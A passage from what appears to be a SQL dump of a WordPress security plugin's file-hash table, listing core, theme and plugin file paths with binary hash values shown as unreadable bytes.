3t','wp-includes/class-wp-admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�;1�q�h��Nu�','g��)HH^�t�\\�(Ɵ9S��vI}�\n��\rY��','',0,'?'),('ֹ���c_`b=�HB5T�','wp-content/themes/nirvana/admin/images/schemes/Autumn Rose.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_����k]�W�0�','�,Dtlrk8.7������mx�)�t�T5 �','',0,'?'),('ֻ�X,��{�+��~q1','wp-content/themes/mh-magazine-lite/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',���?�����Fču','�mu�u��T0g.Q߶OA�;�>�ath�:','',0,'?'),('ֽ�B��m�O�*�:q�z','wp-content/plugins/wordpress-seo/vendor/composer/ClassLoader.php',0,'�~��1�ηP *�.','�~��1�ηP *�.','�������k�����<.�&�4�V�ן��p','',0,'?'),('��J��!�[W6ݧ�','wp-content/plugins/wordfence/lib/IPTraf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8�w�VX�8��~$�','����%����m���򳚫-[�\0:�&��','',0,'?'),('��ײl.#)iD���','wp-content/themes/sg-window/img/icons/small/digg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�һ���C =�','�,���5�]+��l�,��n@���A1B�:���','',0,'?'),('�6�_����zTU�','wp-content/themes/twentyseventeen/template-parts/post/content-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�[��HB���B�3','��r�R�q���5�zW\"�f�\\�n�C���X�','',0,'?'),('�s����k�Zooz\r','wp-content/plugins/unyson/framework/includes/option-types/upload/static/css/any-files.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�wZ��0G��ٯ}','�dX��k��p\r�ա�v�V= K��D�����K','',0,'?'),('�a^}��i][��`�Y','wp-content/themes/fabulous-fluid/images/arrow-down.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*e���]\rz4�','��Y\\�˱���/� ^�}���q��p��l','',0,'?'),('�#�{�3�z!�\rB�	','wp-content/plugins/unyson/framework/static/libs/font-awesome/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e\n�so��As��','4�.�}�q�dLp�Դ\\���E���{p�v0','',0,'?'),('�m��L��K��*�','wp-content/plugins/unyson/framework/includes/option-types/icon/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%C_69�l�S1z��ղ','��i�l~E7Ű��Fd襋_QylWE��0�','',0,'?'),('�1����!�k��A�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/includes/fw-option-type-table/views/cell-head-template.php',0,'�-�j����pAf�p�','�-�j����pAf�p�','G_�n��`9�±V�#��诌i��W��A�}','',0,'?'),('�Gȩ��6����\0Y','wp-admin/includes/class-wp-posts-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~ս�rC��C��ԎJ','�в�U���,�(�v.��W�-W��>udDɾ�','',0,'?'),('�I�	J��a~R��Z�','wp-admin/includes/class-wp-application-passwords-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��\\�б�(�\"��E','}|N�on-����q(\\��F�SX�i\'��$','',0,'?'),('�M\0���c����_d�','wp-admin/includes/class-file-upload-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��;>�x�Z�s�6','[\"o�^�.q`Oצ��v��<���Q�+FM�4��','',0,'?'),('�P!����}�S�Ұ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,W��	�)��,�^�m','G+xڍaȴѾ䄮�C\0B��,��L��w','',0,'?'),('�X�J�K�3��F~�','wp-content/plugins/wordpress-seo/admin/views/js-templates-primary-term.php',0,'���cq�t�{�<','���cq�t�{�<','��>��	�/�׈lG��j$Z.�Z��Ac��F=','',0,'?'),('�_xVI,�5�@)IH��l','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.de.php',0,'�O��sl���;RQ~f','�O��sl���;RQ~f','ݛu�`]]��G�$PK0�1,P��Pr���v�d','',0,'?'),('�a����E��{B)p��','wp-content/themes/vega/sample/images/featured-image-6.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fUd��r)\0��<�m�','2P�*�&�XyC��Vv�u[Pj�{a�?l@�s�J��','',0,'?'),('�f�k[x���� \\�/Y','wp-includes/js/dist/redux-routine.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�����!?2�\rN�5��','MW��*����I�5��MyZd�җ\Z��','',0,'?'),('�n\\w�;\\]Ǜ��#�','wp-content/themes/twentynineteen/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>�������:�t','yg�۱���Jg��zV��x�����=H�','',0,'?'),('�w�h]�á�&�wM��','wp-includes/class-wp-network-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&���\n�oW@=�؞','���_�WSA/�0ϫ;��r�³�DZ\\/��','',0,'?'),('׉BF�}��W�V��[\\','wp-content/themes/nirvana/fonts/opensans-regular-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8QQDr�<H�&;�','XAc�΃J���A\r���Pk�탗Ԩ���d','',0,'?'),('ך^���6eB����','wp-content/themes/nirvana/languages/de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(v�*��ʳG��','/	��	�\"�ӗI���{�%�8T_�Y�X','',0,'?'),('כPl��/s;��-','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.tel.php',0,'�DU����HbY����','�DU����HbY����','�8Þ,98B��;O��5�͑���;B|6\Z�\\�','',0,'?'),('מ�y�7mE5���O_�','wp-admin/js/media.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˒*�B��SW8*��','}\\_L�n\"è�~������؅�=�v�Bى�','',0,'?'),('צ��b4-��])Bܲ','wp-content/themes/clean-magazine/css/genericons/genericons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P\r�6��Xw��x�M',')��@ �ѵv�P�4\\W*Y�\'�-c�|����','',0,'?'),('��j0���w�E}®R�','wp-admin/css/wp-admin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�Upʓ�H�WtP!�H','�^���E-�R�����\'#?�le��mL0�kU@�','',0,'?'),('��r��\0�����M	>{','wp-content/themes/accelerate/js/jquery.cycle.all.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�+_tu�|>4��� ','o%#�L��䢑4�xl-�t�bz��\\�--','',0,'?'),('��^�u����}�G��','wp-content/plugins/wordfence/lib/email_unlockRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��΁~͟��ak��','u\Z�g$}o����bĄ��+\r��\n���8�','',0,'?'),('��}1H�\"~���lrg�B','wp-content/plugins/unyson/framework/includes/option-types/rgba-color-picker/static/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�	��U��-�Iu��','CA��U�HT�K%<��)�0�)�J�bA`ۦ�','',0,'?'),('���M����R�N�a �','wp-content/plugins/wordpress-seo/admin/class-bulk-description-editor-list-table.php',0,'ݣ�0�:�����́�','ݣ�0�:�����́�','_�at��\\O����r��&��5��M�`U,','',0,'?'),('�O�q���v�D��{n','wp-content/plugins/wordpress-seo/admin/class-stop-words.php',0,'��PS �$�\\=k �15','��PS �$�\\=k �15','��=�5p�	��`�ڝ�����w���yA��','',0,'?'),('�����C|���Pf��','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lY�Z�iਆ�3\02[','(��A#��F���~+���Fgh��S�.�b','',0,'?'),('��^�Z��>ijP]','wp-content/plugins/contact-form-7/languages/contact-form-7-tl.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�X�rd�gn��','^\r�������/���h��z�ӁS�ysf�','',0,'?'),('��<Q����_4�t','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6df(��ek�J�A�XY','���I�WN�J��A�G\0n>aA䰦����','',0,'?'),('�[���\\��	=�y','wp-content/themes/supernews/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8��/����UN3','�\nq�\\#��)��Z�Y[cD}-�;>���Q�','',0,'?'),('��\Zv�I:wm�\'~K-','wp-includes/ID3/module.audio-video.riff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"���:\'9���P�','��}\",.~�~��s����U�5�~�`x��P�','',0,'?'),('��]�f2��p�Ƶbd6','wp-content/themes/travelify/languages/sv_SE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���hq11,�}�','߯�]�e��\r\\ *b�Κ�ח��1�#1�\\K8c','',0,'?'),('�&�Zh�$�Éo�','wp-includes/class-json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kE\Z�[Z����䰱�','�D����t��5��^	�σ�7�2��7�{','',0,'?'),('�5d��pSY[{:ު�~','wp-content/themes/verbosa/admin/defaults.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Og��.��0��<(P','�[\"jZt��\'x{ƙ6�Z�聏�(�xk��','',0,'?'),('�8/B��$8���`m�','wp-includes/js/imgareaselect/jquery.imgareaselect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XCJa_�M����','nP>�o��~Q��^��d|	�Q[A�HbB�l�B','',0,'?'),('�=I�D ��L}��$LS','wp-content/plugins/unyson/framework/extensions/social/extensions/social-twitter/helpers.php',0,'�*3fT$��±�^���)','�*3fT$��±�^���)','C)�6\"V兟�V�9&\0Y���]玂)��\r�[','',0,'?'),('�A�h)I�\Z]Gr��E','wp-admin/includes/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\���ܚ����;','ADL��;U����˓�s��{j^��ߙʃ���','',0,'?'),('�J=R\'���t^�}�\n','wp-content/plugins/wordfence/images/2fa2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0��H','n�p��ʅ���G��0�6Kq�J]����J�','',0,'?'),('�M&�3\r�3CMaQ{','wp-admin/images/yes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��7܉�\rqZ�Qk','�=�Q��G���9%�K���,�\r�\ZF�y���','',0,'?'),('�V��5�<�\0���v��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item-manager.php',0,'\rv�\"�&�-1�<��','\rv�\"�&�-1�<��','�����+\Z~O�wW�j\"��w������D�','',0,'?'),('�c��|�^����=>','wp-content/plugins/unyson/framework/extensions/backups/extensions/backups-demo/class-fw-extension-backups-demo.php',0,'`��@����O2��\\�ׄ','`��@����O2��\\�ׄ','˷��v�q���d�K�{�\"�L�Bv_����','',0,'?'),('�o�ǣ�	ף�f0�Y','wp-includes/SimplePie/Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ز3aݩ�0)��_�S','���760�w8��([���o�W��K��4d���','',0,'?'),('�s�� �Z�u`�0\n��','wp-content/themes/clean-magazine/js/source/fitvids.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�B�[��s��o��X','�F�9��\r�IA.�QVE�O~M���-��Q�','',0,'?'),('�v����\r�&X��','wp-includes/js/jquery/ui/selectable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZIr��]-�4��','�]���+�R��s���z�lC�a���(8��','',0,'?'),('�x��βЦ��A	�<�','wp-content/plugins/wordfence/lib/wfCrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�R`�����9|�e','U�͊�s��ds�9;�C�O���Ȥ�@','',0,'?'),('ؓ���_\0v�4CQF�0','wp-content/themes/wen-business/third-party/font-awesome/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KZ����H^P:���','���f�N�h�~�\r}A�|IC�wE��','',0,'?'),('خ�zG�ns�&�CO','wp-content/themes/hueman/assets/front/js/lib/smoothScroll.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(��B�w�k����','p��Q���D��A���[�ƺf&�4z','',0,'?'),('خ�7QD�Usc8\n��','wp-content/themes/clean-magazine/js/widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ц��~G��a�a�i/','#y�_����E�o���ۉ%�-k�-\"��T�W','',0,'?'),('ر�-�_}Z�h��\n�\Z','wp-admin/includes/class-walker-nav-menu-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��H�Y��SAK�k�\n�','�M��$N}�IF��)M����`\r�c�*�Q4��\'\n','',0,'?'),('طAs������`���','wp-content/themes/alpha-store/lib/cmb_extension/js/select2-init.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ã�\0n�/2��V|n�t','�eZ��X��ټw�!�FΞ���*]�/�2o\Z#','',0,'?'),('عMF�	f�\"I۬','wp-content/themes/illdy/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dY��M8�x[~�}','�g\r��p�S���xa>\ZD�5\0.\Z����	','',0,'?'),('ؽ�)��uҶ�ew��l','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mhOല�f�.I','�o�O�b�9_��b�-4��-�x%�T���5E9\'�','',0,'?'),('��\\�12%���=6��','wp-content/themes/sg-window/inc/customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��ޞƲ���p)��=�','jt�^�>v;4��]�T�8ʨ3�R�ia���g','',0,'?'),('���5����Z�a�#�','wp-content/plugins/spam-captcha/core/img/tab_doc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�Qe6F\"~����','�P�t����dJ�oNH�M���@\rf�bMt�','',0,'?'),('��y8����w�U)��','wp-content/plugins/spam-captcha/core/progress_bar.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%���\\c`�0G1�aĎ�','>�]�R�U�`�i���u���l�m��P���E7','',0,'?'),('���X�f��^(���.�','wp-content/themes/point/images/apple-touch-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�^�P�d?:y��','	�$(����G���;�f��&�=t�~�굮��','',0,'?'),('��c(Fc%B�1�s�','wp-content/themes/fluida/admin/images/magazine-1col.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/��|�fdL�.','��$b�(兼���uj�v�F�ˤ7�I','',0,'?'),('��ҡ���K%����^�','wp-includes/js/dist/dom-ready.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`]���VV>�ŭ���','�d|�‹�>Ν��g�%��I��LtJJ��q��','',0,'?'),('��)up�~�U�r�-�','wp-content/themes/supernews/acmethemes/customizer/footer-section/footer-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�R� ����\'�||�','o��]v��4̄�ӡ8f���Ʀ+AM=o��|�','',0,'?'),('�\n�������y��','wp-content/themes/sg-window/img/1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0>I��1\\��eO�','k��Xu � �g��A��I��8�[{5�<�','',0,'?'),('�-h\n\r`��ýەC/s','wp-includes/class-wp-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�1����4�f��','���c}���g�I��	�@�9�Lf��\\','',0,'?'),('���g��1*r�c','wp-content/plugins/spam-captcha/core/lang/SL_framework-pt_PT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ?���1	jlW��','��e�@\nS��O%��������l��A��в@�y','',0,'?'),('�>���,���ε?g�','wp-content/themes/hueman/functions/czr/tmpl/modules/body_bg-module-tmpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=ܭq�\r/��U�r��','���͓�� b\n;I\n}�0Yҿ	�7Ȥ\".��>q','',0,'?'),('�\Z\"\'h:�\Zj��\ZxF0','wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc-issues.php',0,'�m�gGA\\A���_KX��','�m�gGA\\A���_KX��','AP>�D�B��z=���M�cj�Q�q��PU','',0,'?'),('�r��-����D.�\\�','wp-content/themes/twentytwenty/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7H7��g��t~��Ǿ^','���^��Q��EQ�>���[�!��Be&z��','',0,'?'),('�%N�^ǽv�7s�@\n�5','wp-content/themes/twentytwentyone/assets/css/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E²���0�`�ʉ]','��_��O9��k|	����(B2��rN���','',0,'?'),('�,(�i7:^�^�#','wp-includes/js/tinymce/plugins/paste/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dX�������z҆֫','�f��\0W{?q��������Ul�P�֫c8','',0,'?'),('�>��[�ұE�D�;�','wp-includes/block-patterns/three-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ǟ�(	aL�)�m','\r��)��k���O�dS0�X�z���_����','',0,'?'),('�@�_��E#�]b��^~','wp-content/themes/sg-window/img/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�{I�X���s�s���','`�K�rБx`�3o&;\0�}��g��5�o^�','',0,'?'),('�@��~b0YF�\r$ѭm�','wp-content/themes/nirvana/fonts/opensans-light-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L j��:h�i4�\\','�޲b;�V��)\Zȴ{)LV��̺����d���j','',0,'?'),('�D;�t|C�%���A','wp-content/plugins/spam-captcha/core/templates/my-plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�.�Dj��g�Ѝ��','\Z�[�Z�br`z}�Dl��]��W;���','',0,'?'),('�J��^\Z7��uG�k+','wp-content/plugins/wordfence/lib/wfDB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�_<���-1�__I��u','�%d����d��_�\01@TY�$����A','',0,'?'),('�M��{0:�\0L���4','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-login-fails.php',0,'�\"�ky ��x�2�c','�\"�ky ��x�2�c','Q7��<�!<�� +��q\rI������2=XƦ','',0,'?'),('�M�@�E4GЮZm:','wp-content/themes/barletta/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z龖&�Y$�a�','k)���YB�|�^�\'Gz��^���B����K','',0,'?'),('�\\b4�g��mٞjK��','wp-content/themes/illdy/Gruntfile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�����²�RH�[','�Y avA����X�B��=^E��d\Z�������','',0,'?'),('�c ʕ�S��z�O�','wp-content/plugins/spam-captcha/core/lang/SL_framework-vi_VN.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zzj��=�Rs`�s&n#','˶q�������w[�ŮƶI�h�(�|��U�','',0,'?'),('�d��%3��Z�4��_+','wp-includes/css/dist/edit-post/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0L��˥s>7{�v�','��*��/K8��`3񶈂IiCd$���1�O','',0,'?'),('�iXx�]�[�8��Ԁ{','wp-content/themes/hueman/assets/czr/js/czr-control.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P��ן;��fC�','L�]�@D���[��O�L���%��m��d','',0,'?'),('�k��/y�����&��G','wp-includes/images/rss-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ya[�Q���rj�','yS0�c`\n7��as��#�n��Y���','',0,'?'),('�l;ao��~�G��','wp-includes/Requests/Exception/HTTP/501.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eڸ04�-?��ב�5','�k�G寲�\n΃CD#�6�u\Z�քEڣ@K1','',0,'?'),('�o}��݂��\r��/@�','wp-content/themes/lightly/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,��_�ݴ�Q�;ƒ',']28�v�P�j��8Wz�j����y����m�\"','',0,'?'),('�p��֭�9j_\Zl��$','wp-content/themes/fabulous-fluid/inc/metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�sa����q�0\Z(2v+','O��u���.�/.3\\��q;���B��','',0,'?'),('�r\nU\0�F�o9K��','wp-content/themes/aqueduct/img/centered.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�\"l�~�DF\'e','��lT�^TB$F��7v��P���:~G��[�','',0,'?'),('ف\n)S�ʜ���IqD','wp-content/themes/travelify/library/panel/show-post-id.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W\\�$�خ�=���(','х�ZɌAx�.T��I��o�b��[��&*]!�','',0,'?'),('ق���)�4�g����0h','wp-content/themes/twentynineteen/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�oG;� k�\Z\"�','��ՙda��1,6����9�%ef;V�5+�','',0,'?'),('وpi6���x���','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.au.php',0,'�Ez�׻W�Wk��)�%�','�Ez�׻W�Wk��)�%�','Ҏe��8_R���m��<MG��M�r�J��_(��','',0,'?'),('و�TĖhx~Dt>l�','wp-includes/js/dist/compose.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%�����\"\r�)��','�\n�8�����P��˷Gςw�G�>ܟ�','',0,'?'),('ي�<\0��>ִ;�H<�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_alerts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9eU�Lp����a=','d۲��\'��^ݷ�z���=�\nHR��#8�q�','',0,'?'),('٘�\"P�ܞ��,���','wp-content/plugins/wordfence/images/icons/ajax24.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('ٝ��=�T�Ff	���','wp-content/plugins/contact-form-7/languages/contact-form-7-si_LK.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I ��:�w���5�ڿ','��(�E�̺^�Ų�:rWӢ�j���V\0�3�','',0,'?'),('ٵ-������W��ώ�','wp-content/themes/alpha-store/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��rQN*��8�:A�*','��F��˪V�\"�(�ߌ�KBm���y?�\n','',0,'?'),('ٶ�tїoF�؄��m','wp-content/themes/precious-lite/css/theme-responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p���u��&ׂgGok/O','*��ֽ7����TH�U��|P�#�{w!Jg�N','',0,'?'),('ٺ��2ڑ�D��,�#�','wp-content/themes/sg-window/img/icons/small/google.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ō) \Z6�������','��۩8�ئf�&0\Z`\'��`���|�v�|o','',0,'?'),('ٻ��kr����J߶�','wp-content/themes/nirvana/images/slider/nirvana-slide1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZH�n�~���#���','ZlH�23�	K\"����s�}�tV�װ���2�','',0,'?'),('پ[��v�J_.�G�','wp-content/themes/twentytwentyone/assets/js/palette-colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-���|��e,��','#���&=!����ȝp�x�ǻ�\\7��2�y','',0,'?'),('�X��%�18\'\Z����','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.psiusa.php',0,'bJ�R�4����H��','bJ�R�4����H��','��y����mT��`(�w�;(�c���a�#�','',0,'?'),('��3��I�98\\�֛�[t','wp-includes/random_compat/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�RX�Ǡ�ͤB�n6','8�-%���s�`N��a�L	�L�M�ʫ�)�','',0,'?'),('��v@f�¢�z���','wp-content/themes/illdy/sections/front-page-testimonials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5a�ԏ�@%����7)','/�#�R8���A1P7���y���:A	5��','',0,'?'),('��!}�=�`*�gZ=','wp-admin/network/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ь�ԥ�d�o|��ܪ','��%�v׫\0���\r��΋��:c��GO���','',0,'?'),('��Z���\\�Ze','wp-content/themes/sg-window/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1;��<�S$�ӏ���','D1]ʺ,A�g�M?�u�����w�I�X�z���;,','',0,'?'),('�\Z[�f�q?��y','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_scaffolding.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<���y�+��1','�$~�X�`�k�v��y.^5��z�B�+2r�AP','',0,'?'),('���x->�\"��՛$�','wp-content/themes/mh-magazine-lite/languages/sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pSf����p�I�','YhSQ�������޳tu^�}�7x8�DU	&','',0,'?'),('�VBǡ��\Z�B\"\0��','wp-includes/js/codemirror/esprima.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d_� �S��g��ٛ��',']�;�%Js��lx��Fq��BH\Z�U8��','',0,'?'),('��B�Uo5��E#s�\"','wp-content/themes/nirvana/images/socials/Technorati.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Em6B6�?3��;�5�','J\\r���	q�6�\"�Q����v�l�����ʓ�\"','',0,'?'),('�>�~�!�g�q��','wp-includes/js/tinymce/skins/lightgray/skin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��B���&�pw�','7>xV&v|­��U�& ݷ\"ǥz9j�F%ѽK��V','',0,'?'),('�\r��Be�ׯE�7','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y}���`8v�FJ','�U��߆(�[�r嵳��g���h��嬵!m9(\"�','',0,'?'),('���u��xy���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.html',0,'��ُ\0��	��B~','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('����;�-qu%�S\Z	n','wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/class-api-request.php',0,'iYز�y�o�2���A','iYز�y�o�2���A','����z@8���)����E=�O\'.�Iİ5���','',0,'?'),('��	�� .��h�','wp-content/themes/fabulous-fluid/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�Ÿ��%\Z|\'� S','Zg\"4��Dƕ|�s% �F#[����ذg��:��','',0,'?'),('��w�=Ţ�O�&�F�','wp-admin/css/colors/midnight/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&܍���|DW��!E�4','S��o�Gp����{���\"�FuS�&�����','',0,'?'),('�}qN2�E�. .','wp-content/themes/wen-business/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Р�� n;�E\\^�-!','\n�BAbGӬ�x�S�PRmضҠ��O�eI�,Dj�','',0,'?'),('�&L\n��c[��! g&\"','wp-content/themes/supernews/acmethemes/customizer/options/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{%�\"�}��ʷ9��<�','&z��Gz����C�W����k�W�㨵���','',0,'?'),('�\'��7��b��~ 6','wp-includes/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ң-���с��','�9\0zot�ID:\0����g� I%�~ަ��$o','',0,'?'),('�)�?\n�%�yы�B63-','wp-content/themes/nirvana/js/jqueryui/css/ui-lightness/jquery-ui-1.8.16.custom.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<��ĉPl}\r�RF�','8�u(�C���%k;�@a��Q�	\"D��$�FVM','',0,'?'),('�,\r��	�g�H�6','wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','᪟L֍6����\0��W','�\0�6�3^r1�l�9cqY�p�h�Okl�\r�K','',0,'?'),('�,� afC�Lrb`','wp-content/plugins/unyson/framework/helpers/class-fw-resize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���������A$�B(O','\Z�D��:��4�\\Y�U�êÂ�0��7$�X','',0,'?'),('�2�6,̞|ke�L\ns','wp-content/plugins/wordfence/images/2fa1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/)�h\\ h�G�8�','C�%�0�z)f 